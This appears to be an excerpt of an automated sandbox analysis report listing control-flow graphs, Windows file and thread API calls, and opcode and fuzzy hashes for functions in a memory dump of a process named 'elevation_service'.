                                                                                                                                                                      control_flow_graph 564 8960f0-8961bd 567 8961bf 564->567 568 896152-896165 SetFilePointerEx 564->568 567->568 569 8961c1 567->569 572 89612b 568->572 573 896172-896174 568->573 571 896135 569->571 574 896139-89613c call 8c7164 571->574 572->573 577 89612d-89612f 572->577 575 896141-8961c8 573->575 576 896176-896183 call 8c715c 573->576 574->575 578 896131-8961a8 575->578 584 8961ce 575->584 591 896101 576->591 592 896103-89611a ReadFile 576->592 577->578 584->578 586 8961d4-8961ea 584->586 588 8961fb-896201 586->588 589 8961ec 586->589 589->588 593 8961ee 589->593 591->592 595 89614a-89614e 592->595 593->588 596 8961aa 595->596 597 896150 595->597 596->574 598 8961ac 596->598 597->568 597->596 599 896189-896193 598->599 600 8961a3 599->600 601 896195-89619b 599->601 600->571 603 8961a5 600->603 601->574 602 89619d 601->602 602->600 603->571 603->599
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: cbc2541052c6c4d3f878d336b734c4f9e798dc65864beb8e7fadeedf304e376e
                                                                                                                                                                      • Instruction ID: 297df88ce19e60d71aaa68cb9d3437032f9b0a194aa32be2f4d0e0fd77f873b2
                                                                                                                                                                      • Opcode Fuzzy Hash: cbc2541052c6c4d3f878d336b734c4f9e798dc65864beb8e7fadeedf304e376e
                                                                                                                                                                      • Instruction Fuzzy Hash: 6821332020C64E8EDF697A289844B3A3A65FB91328F2D416FD447C2147FA29CC36A342
                                                                                                                                                                      Function 0089CDD0 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 605 89cdd0-89cdd8 606 89d49e-89d4a0 605->606 607 89d27a-89d27b 606->607 608 89d4a6 606->608 612 89d3f7-89d406 607->612 608->607 609 89d4ac-89d4b0 608->609 610 89d225-89d22b SetFilePointerEx 609->610 611 89d4b6 609->611 610->612 611->610 613 89d4bc 611->613 614 89d408 612->614 615 89d427-89d429 612->615 614->615 616 89d40a 614->616 617 89cf4d-89d250 615->617 618 89d42f 615->618 619 89d48a 616->619 622 89cfca-89cfcc 617->622 623 89d256 617->623 618->617 620 89d435 618->620 619->606 620->619 623->622 624 89d25c-89d269 WriteFile 623->624 624->607
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,?,?,00000000,?,00899B29), ref: 0089D225
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 5d0fc6403e351e815543ce49452ed1ae3c45d62299d52813147e212a4f9c0176
                                                                                                                                                                      • Instruction ID: 044c4c8477ae4c0738b8f46bb0f3bd1f53e687af74e3f0c8608dd7422b88aeca
                                                                                                                                                                      • Opcode Fuzzy Hash: 5d0fc6403e351e815543ce49452ed1ae3c45d62299d52813147e212a4f9c0176
                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF02222A4C309EEBE3D3348FC0A9763668F652734B2C029BF157E0413A896BC06512D
                                                                                                                                                                      Function 00895910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1046 895910-895912 1047 895950-895968 1046->1047 1048 895915-895928 call 8c9970 1046->1048 1047->1048 1050 89596a 1047->1050 1055 8959b8 call 8b0df0 1048->1055 1052 89592f 1050->1052 1053 895970-89597b 1050->1053 1052->1048 1054 895931-8a072c 1052->1054 1056 89597d 1053->1056 1057 8959d4 1053->1057 1064 8a0732-8a0738 1054->1064 1065 8a0806-8a0809 1054->1065 1063 8959bd-8959c2 call 895d90 1055->1063 1056->1057 1061 89597f-895981 1056->1061 1059 8959d8-8959de 1057->1059 1060 89593b-895a15 call 8b11a0 1057->1060 1076 895994-89599c 1059->1076 1079 8959e0 1059->1079 1067 895983-895a38 1061->1067 1077 8959c7-8959ce 1063->1077 1071 8a073e 1064->1071 1072 8a0800 1064->1072 1080 8a079d-8a07a6 1065->1080 1075 895a3e 1067->1075 1067->1076 1071->1072 1081 8a0744-8a0774 1071->1081 1072->1065 1078 8a06b3-8a06b7 1072->1078 1085 895a2c-895a34 1075->1085 1088 89599e-8959f7 1076->1088 1089 895a02 1076->1089 1086 895a1a-895a26 1077->1086 1087 8959d0 1077->1087 1078->1080 1092 8a06bd 1078->1092 1079->1076 1090 8959e2-8959ec 1079->1090 1083 8a07a8 1080->1083 1084 8a0791-8a0793 1080->1084 1099 8a077a-8a081c 1081->1099 1100 8a06d5-8a06d9 1081->1100 1083->1084 1094 8a07aa 1083->1094 1102 8a07ca-8a07cc 1084->1102 1093 8959d9-8959de call 8c2190 1085->1093 1086->1085 1101 8959a1-8959b5 call 895e10 1086->1101 1087->1086 1095 8959d2 1087->1095 1088->1089 1089->1053 1097 8959ee-8959ef 1090->1097 1098 895a62-895a6e 1090->1098 1092->1080 1103 8a06c3-8a07fe 1092->1103 1093->1076 1093->1079 1094->1102 1095->1093 1097->1067 1111 8959f1 1097->1111 1104 895a70 1098->1104 1105 895a75-895ab3 call 8b1280 1098->1105 1099->1080 1107 8a06db 1100->1107 1108 8a06df 1100->1108 1101->1055 1121 895a08-895a0b 1101->1121 1103->1072 1104->1105 1113 895a72 1104->1113 1135 895abb-895af2 1105->1135 1136 895ab5 1105->1136 1107->1108 1114 8a06dd 1107->1114 1108->1080 1111->1048 1113->1105 1114->1108 1119 8ac0cc 1114->1119 1122 8ac0e8-8ac102 1119->1122 1123 8ac0ce-8ac0d0 1119->1123 1121->1076 1124 895a0d 1121->1124 1126 8ac0d2-8ac0df 1122->1126 1128 8ac104 1122->1128 1123->1126 1130 895991 1124->1130 1131 895932 1124->1131 1137 8ac0e7 1126->1137 1128->1126 1128->1137 1130->1131 1134 895993 1130->1134 1134->1076 1135->1078 1136->1135 1138 895ab7-895ab9 1136->1138 1138->1135
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 384e8f61db65d166d8c02f0d5f1707aca12a4f3125dfee385905d896a56423d5
                                                                                                                                                                      • Instruction ID: 4e0866edc23fb9f6775eb0b4f66c61101d2e65ceca0e8b619865e3fba4522355
                                                                                                                                                                      • Opcode Fuzzy Hash: 384e8f61db65d166d8c02f0d5f1707aca12a4f3125dfee385905d896a56423d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 41F14A2071CE4C8FDB6AA71C68553FA77D1F79A324F58019EE08BC7396DD249C068786
                                                                                                                                                                      Function 0089A39D Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1140 89a39d-89a3bd 1141 89a5ba-89a5c8 SetFilePointerEx 1140->1141 1142 89a44a-89a44d call 8c7164 1141->1142 1143 89a5ce 1141->1143 1147 89a452 1142->1147 1145 89a459-89a476 1143->1145 1146 89a5d4 1143->1146 1155 89a56c-89a56e 1145->1155 1156 89a47c 1145->1156 1146->1145 1148 89a5da-89a5de 1146->1148 1152 89a4c3-89a4d2 1147->1152 1153 89a454 1147->1153 1149 89a4a7-89a4ad 1148->1149 1150 89a607-89a609 1148->1150 1149->1142 1157 89a4af-89a4ba 1149->1157 1158 89a60b 1150->1158 1159 89a5b3 1150->1159 1166 89a4e5-89a4e9 1152->1166 1153->1152 1154 89a456 1153->1154 1167 8ae501-8ae507 call 8c715c 1154->1167 1155->1142 1164 89a570-89a64a 1155->1164 1156->1155 1162 89a482 1156->1162 1157->1142 1163 89a4bc 1157->1163 1158->1159 1165 89a60d-89a617 1158->1165 1159->1141 1162->1166 1168 89a3f9-89a3fc 1163->1168 1170 89a508-89a510 1164->1170 1171 89a650 1164->1171 1177 89a673-89a675 1165->1177 1172 89a599-89a59c call 8c715c 1166->1172 1183 8ae50c 1167->1183 1174 89a540-89a546 1168->1174 1175 89a402 1168->1175 1170->1142 1180 89a516 1170->1180 1171->1170 1178 89a656 1171->1178 1185 89a5a1-89a5ab 1172->1185 1181 89a54c 1174->1181 1182 89a414 1174->1182 1175->1174 1184 89a408-89a63a call 89a9f0 1175->1184 1177->1152 1186 89a67b-89a681 1177->1186 1178->1177 1180->1149 1193 89a48e 1180->1193 1181->1182 1188 89a552 1181->1188 1182->1142 1190 89a559 1182->1190 1183->1183 1184->1150 1185->1141 1192 89a5ad 1185->1192 1186->1167 1188->1152 1195 89a55b-89a561 1190->1195 1196 89a567-89a5f1 1190->1196 1192->1141 1198 89a5af-89a5b1 1192->1198 1193->1149 1200 89a490-89a49c 1193->1200 1195->1142 1195->1196 1203 89a3df-89a3e7 1196->1203 1204 89a5f7 1196->1204 1198->1159 1200->1149 1205 89a58b-89a594 1203->1205 1206 89a3ed 1203->1206 1204->1203 1207 89a5fd-89a601 1204->1207 1205->1172 1206->1205 1208 89a3f3 1206->1208 1207->1150 1208->1168 1209 89a56a 1208->1209 1209->1155
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A5C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 6481628bd4199b2a9b78a87b4116708f0299d0a78705dbf8fde1743bdb7ac037
                                                                                                                                                                      • Instruction ID: 820222321a8fb7be1bf18c5d9104dcb612de316d0240b30276a60470c33cb129
                                                                                                                                                                      • Opcode Fuzzy Hash: 6481628bd4199b2a9b78a87b4116708f0299d0a78705dbf8fde1743bdb7ac037
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E51282070D3898FCF2E7B685C596353BE4FB52714B2E01ABE087C7192DA598C05A3DB
                                                                                                                                                                      Function 00895B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1263 895b42-895b47 call 895d90 1265 895b4c-895b52 1263->1265 1267 895b0d 1265->1267 1268 895c42-895c62 call 8b1280 1265->1268 1267->1268 1269 895b13 1267->1269 1282 895c68 1268->1282 1283 895c24 1268->1283 1271 895c8f-895c96 1269->1271 1273 895c29 1271->1273 1274 895c98-895c9a 1271->1274 1276 895c2f-895c36 1273->1276 1277 895cc2-895cc9 call 8952a0 1273->1277 1275 895c9c 1274->1275 1287 895bfa 1275->1287 1288 895d0e-895d18 1275->1288 1276->1277 1281 895c3c 1276->1281 1292 895c69 1277->1292 1293 895ccb 1277->1293 1281->1263 1284 895c14-895c19 1283->1284 1285 895c26 1283->1285 1289 895cc0 1284->1289 1290 895c20-895c21 1284->1290 1285->1284 1291 895c28 1285->1291 1287->1288 1294 895c00 1287->1294 1295 895d1a 1288->1295 1296 895d54 1288->1296 1289->1277 1290->1282 1291->1273 1298 895b68-895d75 1292->1298 1299 895c6f 1292->1299 1293->1275 1297 895ccd 1293->1297 1294->1284 1300 895d4b-895d52 1295->1300 1297->1275 1302 895ccf-895cdd 1297->1302 1299->1298 1304 895c75 1299->1304 1300->1296 1301 895d45-895d47 1300->1301 1305 895d49 1301->1305 1306 895d5f 1301->1306 1307 895cdf-895ce4 CreateThread 1302->1307 1304->1271 1305->1300 1305->1306 1311 895d65 1306->1311 1308 895cea 1307->1308 1309 895c01-895d41 1307->1309 1308->1309 1312 895cf0-895cf6 1308->1312 1309->1300 1320 895d43 1309->1320 1311->1311 1312->1290 1313 895cff-895d01 1312->1313 1314 895bb4 1313->1314 1315 895d07 1313->1315 1317 895cda-895cdd 1314->1317 1315->1314 1318 895d0d 1315->1318 1317->1307 1320->1296
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 091d7d921b4bd51d6447df8909f7bc09ad4070bea333eb4c4650e03260bfcc13
                                                                                                                                                                      • Instruction ID: 1f1fc768003e860bc5e49baf3f34d606b7aa48b54c72954de25b69e839a95820
                                                                                                                                                                      • Opcode Fuzzy Hash: 091d7d921b4bd51d6447df8909f7bc09ad4070bea333eb4c4650e03260bfcc13
                                                                                                                                                                      • Instruction Fuzzy Hash: DE21AC3020DF498FCFABBB28C8587746AE1FB5532CF6C05A69047CF2A6CA248C449356
                                                                                                                                                                      Function 008994AB Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1321 8994ab-8994be SetFilePointerEx 1322 899858 1321->1322 1323 8994c4 1321->1323 1324 89985a 1322->1324 1325 8998be-8998c9 1322->1325 1323->1322 1326 8994ca-8d57ce 1323->1326 1328 8995a0-8995b1 1324->1328 1329 899860 1324->1329 1327 89981a 1325->1327 1333 89973c-899925 SetFilePointerEx 1327->1333 1334 899820 1327->1334 1331 89993b 1328->1331 1332 8995b7 1328->1332 1329->1328 1335 899866 1329->1335 1332->1331 1337 8995bd-899763 1332->1337 1341 8998ac-8998af 1333->1341 1342 899927-89992b 1333->1342 1334->1333 1339 899826-899837 1334->1339 1335->1327 1344 899765 1337->1344 1345 8997a7-8997ad 1337->1345 1348 89983e 1341->1348 1349 8998b1 1341->1349 1346 89965b-8998a7 call 89eaa0 1342->1346 1347 899931 1342->1347 1344->1345 1351 899767 1344->1351 1346->1341 1347->1346 1352 899937-899939 1347->1352 1354 899518-89951d 1348->1354 1355 899844-89988b call 89ea00 1348->1355 1349->1348 1353 8998b3 1349->1353 1351->1345 1352->1331 1353->1325 1357 8994fa-8994fd 1354->1357 1358 89951f 1354->1358 1360 899708-8999b7 1357->1360 1361 899503-899508 call 8c7164 VirtualFree 1357->1361 1358->1357 1362 899521 1358->1362 1371 8999bd 1360->1371 1372 8997ee-8997f3 1360->1372 1361->1354 1365 8a5710-8a5723 1362->1365 1366 899527-899529 1362->1366 1373 8a5742-8a5774 1365->1373 1372->1327 1375 8a5726 1373->1375 1376 8a5776 1373->1376 1378 8a5728-8a5732 1375->1378 1379 8a579f 1375->1379 1376->1375 1377 8a5778 1376->1377 1380 8a57a8-8a57c2 call 8c2604 * 2 1377->1380 1381 8a5792-8a579d call 8c2604 1378->1381 1382 8a5734 1378->1382 1383 8a57a4 1379->1383 1400 8a573b-8a5741 1380->1400 1401 8a57c8 1380->1401 1381->1383 1382->1381 1386 8a5736-8a5780 1382->1386 1389 8a578c 1383->1389 1390 8a5782-8a57dd call 8c2604 * 2 1383->1390 1386->1390 1395 8a57e5 1389->1395 1390->1380 1415 8a57df 1390->1415 1395->1390 1398 8a57e7-8a581d 1395->1398 1405 8a581f 1398->1405 1406 8a5823-8a582a 1398->1406 1400->1373 1401->1400 1404 8a57ce 1401->1404 1404->1400 1405->1406 1409 8a5821 1405->1409 1410 8a582c 1406->1410 1411 8a57f7-8a584d 1406->1411 1409->1406 1410->1411 1413 8a582e 1410->1413 1421 8a57fd 1411->1421 1422 8a5803-8a580b 1411->1422 1413->1411 1415->1380 1418 8a57e1 1415->1418 1418->1395 1421->1422 1423 8a57ff-8a5801 1421->1423 1423->1422
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 008994B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 0632bc79e136ee572d992be1ae0400c1ca55a9311295f46386f488bd51c3682c
                                                                                                                                                                      • Instruction ID: 52059b8d115f542e6cf886321f23ca524013b76e5158e33bc59a1c1c742028b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 0632bc79e136ee572d992be1ae0400c1ca55a9311295f46386f488bd51c3682c
                                                                                                                                                                      • Instruction Fuzzy Hash: C011C42062DB88AFDF69AE3C441537A76D2F79A314F1C456ED0CFC3161DA258C058702
                                                                                                                                                                      Function 00895B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1424 895b09-895b3b 1428 895cff-895d01 1424->1428 1429 895bb4-895ce4 CreateThread 1428->1429 1430 895d07 1428->1430 1434 895cea 1429->1434 1435 895c01-895d41 1429->1435 1430->1429 1432 895d0d 1430->1432 1434->1435 1437 895cf0-895cf6 1434->1437 1442 895d4b-895d52 1435->1442 1443 895d43 1435->1443 1437->1428 1438 895c20-895c68 1437->1438 1444 895d54 1442->1444 1445 895d45-895d47 1442->1445 1443->1444 1446 895d49 1445->1446 1447 895d5f 1445->1447 1446->1442 1446->1447 1448 895d65 1447->1448 1448->1448
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: bb57c58341d69bf9b7931122a7abe8f11cf541355909bfcae94595946a5fef62
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01803010EF4E8FDFA776249C182797790FB5133CF2D01AA8487CA0D5DB644905A712
                                                                                                                                                                      Function 0089893F Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1449 89893f-898948 1450 898ed9-898ede 1449->1450 1451 89894e 1449->1451 1452 898e75-898e7e 1450->1452 1451->1450 1453 898954-89895a 1451->1453 1456 898938 1452->1456 1457 898e84 1452->1457 1454 898d7e 1453->1454 1455 898960 1453->1455 1454->1452 1455->1454 1459 898966 1455->1459 1458 898b7b-898b8d 1456->1458 1457->1456 1460 898e8a 1457->1460 1462 89875e-899022 SetFilePointerEx 1458->1462 1463 898b93 1458->1463 1459->1458 1466 89908c 1462->1466 1467 899024 1462->1467 1463->1462 1464 898b99-898ba6 1463->1464 1464->1454 1467->1466 1468 899026-899032 1467->1468
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2c124238f25e20e1280168f06d8cdfd02d12cd4cdfd6c6e275a3e5effbad6204
                                                                                                                                                                      • Instruction ID: c92558c6b62720d6e4f96673fae9eedad7ccd4ff916272f21ebb05ee5ac04b27
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c124238f25e20e1280168f06d8cdfd02d12cd4cdfd6c6e275a3e5effbad6204
                                                                                                                                                                      • Instruction Fuzzy Hash: 55018F3061D64BDFDF787B58945863ABBA0FB97364F2D060EC8AAC6195CF358C019642
                                                                                                                                                                      Function 0089A5B9 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1469 89a5b9-89a5c8 SetFilePointerEx 1470 89a44a-89a44d call 8c7164 1469->1470 1471 89a5ce 1469->1471 1475 89a452 1470->1475 1473 89a459-89a476 1471->1473 1474 89a5d4 1471->1474 1483 89a56c-89a56e 1473->1483 1484 89a47c 1473->1484 1474->1473 1476 89a5da-89a5de 1474->1476 1480 89a4c3-89a4d2 1475->1480 1481 89a454 1475->1481 1477 89a4a7-89a4ad 1476->1477 1478 89a607-89a609 1476->1478 1477->1470 1485 89a4af-89a4ba 1477->1485 1486 89a60b 1478->1486 1487 89a5b3 1478->1487 1494 89a4e5-89a4e9 1480->1494 1481->1480 1482 89a456 1481->1482 1496 8ae501-8ae507 call 8c715c 1482->1496 1483->1470 1492 89a570-89a64a 1483->1492 1484->1483 1490 89a482 1484->1490 1485->1470 1491 89a4bc 1485->1491 1486->1487 1493 89a60d-89a617 1486->1493 1495 89a5ba-89a5c8 SetFilePointerEx 1487->1495 1490->1494 1497 89a3f9-89a3fc 1491->1497 1499 89a508-89a510 1492->1499 1500 89a650 1492->1500 1506 89a673-89a675 1493->1506 1501 89a599-89a59c call 8c715c 1494->1501 1495->1470 1495->1471 1512 8ae50c 1496->1512 1503 89a540-89a546 1497->1503 1504 89a402 1497->1504 1499->1470 1509 89a516 1499->1509 1500->1499 1507 89a656 1500->1507 1514 89a5a1-89a5ab 1501->1514 1510 89a54c 1503->1510 1511 89a414 1503->1511 1504->1503 1513 89a408-89a63a call 89a9f0 1504->1513 1506->1480 1515 89a67b-89a681 1506->1515 1507->1506 1509->1477 1522 89a48e 1509->1522 1510->1511 1517 89a552 1510->1517 1511->1470 1519 89a559 1511->1519 1512->1512 1513->1478 1514->1495 1521 89a5ad 1514->1521 1515->1496 1517->1480 1524 89a55b-89a561 1519->1524 1525 89a567-89a5f1 1519->1525 1521->1495 1527 89a5af-89a5b1 1521->1527 1522->1477 1529 89a490-89a49c 1522->1529 1524->1470 1524->1525 1532 89a3df-89a3e7 1525->1532 1533 89a5f7 1525->1533 1527->1487 1529->1477 1534 89a58b-89a594 1532->1534 1535 89a3ed 1532->1535 1533->1532 1536 89a5fd-89a601 1533->1536 1534->1501 1535->1534 1537 89a3f3 1535->1537 1536->1478 1537->1497 1538 89a56a 1537->1538 1538->1483
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A5C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 676bef793c65ca7a3a2905c46ea0cdf499b25737fa985dc8724dd67d4e827931
                                                                                                                                                                      • Instruction ID: 7b6b87c8f845618614820090fad9f4706ae86f53b002c3142e2b3e96c9af305a
                                                                                                                                                                      • Opcode Fuzzy Hash: 676bef793c65ca7a3a2905c46ea0cdf499b25737fa985dc8724dd67d4e827931
                                                                                                                                                                      • Instruction Fuzzy Hash: 9301812060D7898FDF2F7A7049581793FA4FD2271472E1097D482C7093E998DC4587EB
                                                                                                                                                                      Function 0089A697 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1540 89a697-89a6a3 ReadFile 1541 89a6a9-89a737 1540->1541 1542 89a9d1 1540->1542 1541->1542 1544 89a73d-89a743 1541->1544 1545 89a749 1544->1545 1546 89a9e4 1544->1546 1545->1546 1547 89a74f 1545->1547 1548 8c293d-8c2945 1546->1548 1547->1548 1550 8c2959-8c295b 1548->1550 1551 8c2947-8c294d 1548->1551 1552 8c294f-8c2951 1551->1552 1553 8c2953-8c2958 1551->1553 1552->1550 1552->1553
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 1c644a7444de99faaf9beb18aa41b1298ace3a3379acb547bdc547acb6170779
                                                                                                                                                                      • Instruction ID: 1d349b0657004fe38bc9a984210d40a22e2cb28e1f69f5dfc5a137dc3ac0421b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c644a7444de99faaf9beb18aa41b1298ace3a3379acb547bdc547acb6170779
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E09205B0C2465AEE2971280812F3A2D71F761718F2E016B92AAC10D3E839CC05A283
                                                                                                                                                                      Function 0089A6FE Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1554 89a6fe-89a707 1555 89a83d-89a840 1554->1555 1556 89a72f-89a732 1555->1556 1557 89a846 1555->1557 1558 89a6af-89a6c1 SetFilePointerEx 1556->1558 1559 89a757 1556->1559 1557->1556 1560 89a84c 1557->1560 1562 89a778-89a89e 1558->1562 1563 89a6c7 1558->1563 1564 89a758 call 8c715c 1559->1564 1560->1555 1562->1564 1568 89a8a4 1562->1568 1563->1562 1566 89a6cd 1563->1566 1569 89a75d-89a76f 1564->1569 1566->1559 1568->1564 1570 89a8aa-89a8ad 1568->1570 1569->1562 1571 89a8bb 1570->1571 1572 89a8af-89a8b5 call 8c7164 1570->1572 1574 89a889-89a93c 1571->1574 1575 89a8bd 1571->1575 1572->1571 1579 89a861-89a86f 1574->1579 1580 89a942 1574->1580 1576 89a817 1575->1576 1576->1574 1581 89a819 1576->1581 1584 89a9c5 1579->1584 1580->1579 1582 89a948-89a964 1580->1582 1581->1571 1585 89a9cb 1584->1585 1586 89a81e-89a820 1584->1586 1585->1586 1588 89a9d1 1585->1588 1589 89a78b 1586->1589 1590 89a983-89a988 1586->1590 1589->1590 1591 89a791-89a7e2 1589->1591 1590->1584 1591->1570 1593 89a7e8 1591->1593 1593->1570 1594 89a7ee 1593->1594 1594->1576 1595 89a8c3-89a8ce 1594->1595 1595->1571
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A6B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
